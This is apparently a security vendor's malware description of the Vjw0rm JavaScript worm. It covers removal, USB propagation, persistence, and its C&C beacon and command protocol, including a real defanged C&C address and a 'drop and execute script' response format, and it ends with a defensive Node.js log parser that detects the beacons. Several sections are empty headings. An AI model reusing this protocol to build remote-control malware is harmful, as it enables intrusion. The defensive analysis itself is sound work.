
Worm:JS/Vjw0rm

Classification

Category:Malware
Type:Worm
Aliases:

Worm:JS/Vjw0rm, Vjw0rm, Vw0rm

Summary

Vjw0rm is a worm that infects accessible removable storage devices, such as USB flash drives. It can also execute instructions it receives from a command and control (C&C) server, and it maintains persistence on the infected machine.

Removal

Based on the settings of your F-Secure security product, it will either move the file to the quarantine where it cannot spread or cause harm, or remove it.

A False Positive is when a file is incorrectly detected as harmful, usually because its code or behavior resembles known harmful programs. A False Positive will usually be fixed in a subsequent database update without any action needed on your part. If you wish, you may also:

  • Check for the latest database updates

    First check if your F-Secure security program is using the latest updates, then try scanning the file again.

  • Submit a sample

    After checking, if you still believe the file is incorrectly detected, you can submit a sample of it for re-analysis.

    Note: If the file was moved to quarantine, you need to collect the file from quarantine before you can submit it.

  • Exclude a file from further scanning

    If you are certain that the file is safe and want to continue using it, you can exclude it from further scanning by the F-Secure security product.

    Note: You need administrative rights to change the settings.

Technical Details

The Vjw0rm worm is a malicious JavaScript file that spreads by creating copies of itself on accessible removable storage devices.

While active, the worm sends a network request to its C&C server every 7 seconds, providing information about the infected machine and awaiting additional instructions from its operator(s). If it receives instructions, the worm can execute them on the infected machine.

Arrival

This worm can arrive on a computer in several ways:

Propagation

Once it is present on a computer, the worm can propagate or spread copies of its malicious file by infecting removable storage devices that are inserted and accessible. It does so by performing the following set of actions every 7 seconds:

Persistence

In addition to propagating itself to maintain its presence, the worm can remain persistent on the infected machine in several ways:

Network activity

Vjw0rm contacts a remote C&C server to provide its operator(s) with information about the infected machine, as well as to retrieve any additional instructions they may issue.

Request

Every 7 seconds, the worm sends a POST request with a custom User-Agent to its C&C server. This allows the worm's operator(s) to identify which infected machines are online (and so are available to receive commands), as well as providing some basic information about the machines.

The request can be defined as:

 POST [def_host]:[def_port]/Vre
 User-Agent: [tag]_[logicaldiskserialnum]\[computername]\[username]\[osnamever]\[avdisplayname]\\[vbc_exist]\[prev_infected]\

Where the variables are:

  • def_host & def_port: Pre-defined C&C IP address & port
  • tag: Can be defined both pre- and post-infection. It can be set post-infection through the rename functionality from the C&C server. This is useful for tagging and tracking infected computers
  • logicaldiskserialnum: The logical disk's volume serial number; in the request it is appended to the tag with an underscore (as in the example below)
  • computername & username: These are taken from environment variables
  • osnamever: Gets the operating system version (e.g. Microsoft Windows 7 Enterprise)
  • avdisplayname: Gets the display name of any running anti-virus product (works on both pre- and post-Vista Windows by querying both 'winmgmts:\\localhost\root\securitycenter' and '...\securitycenter2')
  • vbc_exist: Checks whether the .NET Visual Basic Compiler (VBC) v2.0.50727 is present
  • prev_infected: Returns the value of the registry key, "HKCU\vjw0rm". This indicates if the user has been previously infected through the worm module, which means that the script has been executed from the root directory of an infected removable storage device

An example of the POST request:

 POST 94[.]237[.]68[.]129[:]2828/Vre
 User-Agent: HookKernel_A8D34214\MYCOMPUTER\Joe\Microsoft Windows 7 Professional\undefined\\YES\FALSE\

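The request above, decoded on the defender's side. This is an added example written for this page, not code from the worm or from F-Secure: a Node.js script that picks Vjw0rm check-ins out of proxy-style log lines and unpacks the User-Agent fields. The log line layout, the sample lines, the client IPs and timestamps, and the second C&C address 198.51.100.9 are constructed for the example (only 94[.]237[.]68[.]129:2828 and the User-Agent come from the example request on this page); splitting the tag from the volume serial on the last underscore is an assumption taken from that example.

```javascript
'use strict';
// Added example (not the worm's code, nor F-Secure's): pull Vjw0rm check-ins
// out of proxy-style log lines and unpack the User-Agent fields.

// The worm POSTs to [host]:[port]/Vre with host details packed into the
// User-Agent as backslash-separated fields.
const VJW0RM_PATH = '/Vre';

// Split the User-Agent into the documented fields. Returns null unless the
// string has the worm's exact shape, so browser User-Agents never match.
function parseVjw0rmUserAgent(ua) {
  const parts = ua.split('\\');
  // Eight fields: one slot (between avdisplayname and vbc_exist) is always
  // empty, and the trailing backslash yields a final empty element: 9 total.
  if (parts.length !== 9 || parts[5] !== '' || parts[8] !== '') return null;
  const [tagSerial, computerName, userName, osNameVer, av, , vbcExist, prevInfected] = parts;
  // The example request joins tag and volume serial with "_"; a tag may itself
  // contain underscores, so split on the last one (assumption for this example).
  const cut = tagSerial.lastIndexOf('_');
  if (cut <= 0 || cut === tagSerial.length - 1) return null;
  return {
    tag: tagSerial.slice(0, cut),
    volumeSerial: tagSerial.slice(cut + 1),
    computerName,
    userName,
    osNameVer,
    // The script emits the literal "undefined" when no AV product is found.
    avDisplayName: av === 'undefined' ? null : av,
    vbcExist,
    prevInfected,
  };
}

// Log line layout assumed for this example (constructed, not a real product's):
//   <timestamp> <client-ip> <METHOD> <url> "<user-agent>"
const LOG_LINE = /^(\S+) (\S+) (\S+) (\S+) "(.*)"$/;

// Return one record per line that looks like a Vjw0rm beacon: a POST to /Vre
// whose User-Agent parses as the worm's field list.
function findVjw0rmBeacons(lines) {
  const hits = [];
  for (const line of lines) {
    const m = LOG_LINE.exec(line);
    if (!m) continue;
    const [, ts, client, method, url, ua] = m;
    if (method !== 'POST') continue;
    let u;
    try { u = new URL(url); } catch { continue; }
    if (u.pathname !== VJW0RM_PATH) continue;
    const info = parseVjw0rmUserAgent(ua);
    if (info === null) continue;
    hits.push({ ts, client, c2: `${u.hostname}:${u.port}`, ...info });
  }
  return hits;
}

// Constructed sample: the page's example beacon, a normal browser POST, and a
// POST to /Vre with a browser User-Agent (the path alone is not enough to match).
const SAMPLE_LOG = [
  '2019-03-01T10:00:00Z 10.0.0.5 POST http://94.237.68.129:2828/Vre "HookKernel_A8D34214\\MYCOMPUTER\\Joe\\Microsoft Windows 7 Professional\\undefined\\\\YES\\FALSE\\"',
  '2019-03-01T10:00:01Z 10.0.0.6 POST https://example.com/login "Mozilla/5.0 (Windows NT 6.1; rv:65.0) Firefox/65.0"',
  '2019-03-01T10:00:07Z 10.0.0.7 POST http://198.51.100.9:2828/Vre "Mozilla/5.0 (Windows NT 6.1)"',
];

console.log(JSON.stringify(findVjw0rmBeacons(SAMPLE_LOG), null, 2));
```

Matching on the field layout rather than on the /Vre path alone keeps the rule usable even when the operator changes the C&C address: the second and third sample lines are rejected, the first yields the tag, volume serial, host details and C&C endpoint as one record.
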
Response

The worm's operator(s) can send a response to the infected machine's POST request that contains commands for the machine to execute. The response can be defined as:

[command][SPL][arg1][SPL][arg2]

Where the variables are:

  • SPL: Delimiter (The default is |V| on both the original C&C executable and the script)
  • command: Remotely issued instructions to be executed
  • arg1 (optional): A payload, usually a script
  • arg2 (optional): Usually a filename

An example of a response that gives instructions to drop and execute an additional script would be:

Sc|V|somescript|V|randomstring.ext

Where Sc is the command for executing an additional malicious module/script, somescript is the actual payload, randomstring is a randomly generated filename, and ext is the extension selected by the operator on the C&C server.

Executing remotely-issued commands

Vjw0rm is also able to execute 5 distinct commands, any of which it can receive from the C&C server as a response to a POST request. The commands are:
